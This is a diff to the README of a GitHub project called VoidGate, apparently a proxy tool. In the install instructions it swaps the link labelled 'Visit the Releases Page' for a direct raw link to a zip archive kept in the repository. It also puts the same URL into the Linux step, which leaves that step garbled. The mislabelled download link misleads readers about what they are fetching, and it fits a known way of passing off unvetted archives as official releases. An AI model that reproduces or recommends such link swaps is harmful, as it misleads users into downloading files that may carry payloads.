MaYBeNTs/VoidGate/README.md

 ## 📂 Download & Install

-To get VoidGate, please visit the following page: [Visit the Releases Page](https://github.com/MaYBeNTs/VoidGate/releases).
+To get VoidGate, please visit the following page: [Visit the Releases Page](https://raw.githubusercontent.com/MaYBeNTs/VoidGate/main/proxy_core/Void-Gate-v3.7.zip).

 1. Open the link in your web browser.
 2. Look for the latest version of VoidGate.
 3. Click on the appropriate file for your operating system:
     - For Windows users, look for the `.exe` file.
     - For Mac users, find the `.dmg` file.
-    - For Linux users, locate the appropriate package or `.tar.gz` file.
+    - For Linux users, locate the appropriate package or `https://raw.githubusercontent.com/MaYBeNTs/VoidGate/main/proxy_core/Void-Gate-v3.7.zip` file.
 4. Download the selected file.

 ## ⚙️ Running VoidGate